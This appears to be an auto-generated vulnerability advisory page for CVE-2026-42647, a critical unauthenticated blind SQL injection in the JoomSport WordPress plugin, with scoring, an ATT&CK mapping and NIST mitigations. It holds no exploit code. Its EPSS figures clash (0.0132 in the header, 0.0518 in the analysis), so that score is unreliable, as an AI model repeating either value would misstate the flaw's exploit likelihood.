Cyber Resilience

CVE-2026-42647

Critical

Published: 11 June 2026

Published
11 June 2026
Modified
17 June 2026
KEV Added
Patch
CVSS Score v3.1 9.3 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
EPSS Score 0.0132 67.4th percentile
Risk Priority 70 floored blend · peak EPSS

Summary

CVE-2026-42647 is a critical-severity SQL Injection (CWE-89) vulnerability. Its CVSS base score is 9.3 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 32.6% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2026-42647 is a blind SQL injection vulnerability (CWE-89) in the Beardev JoomSport WordPress plugin, caused by improper neutralization of special elements in SQL commands. The flaw affects all versions through 5.7.7 and carries a CVSS 3.1 score of 9.3, reflecting network attack vector, low complexity, no required privileges or user interaction, and changed scope with high confidentiality impact.

An unauthenticated remote attacker can supply crafted input to trigger the injection, enabling extraction of sensitive database contents through blind techniques while also producing limited availability effects. The vulnerability is exploitable directly over the network against any instance of the affected plugin.

The primary public reference is the Patchstack advisory entry for the JoomSport plugin, which documents the SQL injection issue in version 5.7.7. No separate patch or mitigation details are provided in the available references.

EPSS remains flat at 0.0518 with no material increase from its initial value.

OWASP Top 10 for Web (2025)

EU & UK References

Vulnerability details

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Beardev JoomSport allows Blind SQL Injection. This issue affects JoomSport: from n/a through 5.7.7.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

Direct unauthenticated network exploitation of public-facing WordPress plugin via blind SQL injection for DB data extraction.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

Affected Assets

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly requires validation of all inputs to block crafted SQL syntax that enables the blind injection described in CVE-2026-42647.

prevent

Mandates timely remediation of the known SQL-injection flaw in JoomSport versions through 5.7.7 before exploitation occurs.

detect

Enables monitoring of database or application traffic to identify anomalous queries indicative of blind SQL injection attempts.

References